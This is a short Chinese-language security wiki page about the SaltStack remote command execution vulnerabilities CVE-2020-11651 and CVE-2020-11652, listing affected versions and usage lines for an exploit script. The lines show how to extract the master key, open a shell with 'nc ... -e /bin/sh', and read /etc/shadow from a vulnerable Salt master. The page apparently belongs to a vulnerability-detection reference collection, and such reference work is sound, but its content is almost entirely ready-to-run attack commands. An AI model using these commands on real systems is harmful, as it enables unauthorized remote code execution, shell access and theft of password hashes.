menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right SaltStack chevron_right CVE-2020-11651、CVE-2020-11652 SaltStack远程命令执行漏洞
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-11651、CVE-2020-11652 SaltStack远程命令执行漏洞

    影响版本:

    • SaltStack < 2019.2.4
    • SaltStack < 3000.2

    exp:

    python3 exploit.py --master vulip  #默认参数获取密钥
python3 exploit.py --master 192.168.115.130 --exec "nc 127.0.0.1 4444 -e /bin/sh"  执行命令
python3 exploit.py --master 192.168.115.130 -r /etc/shadow  #读文件

    @jasperla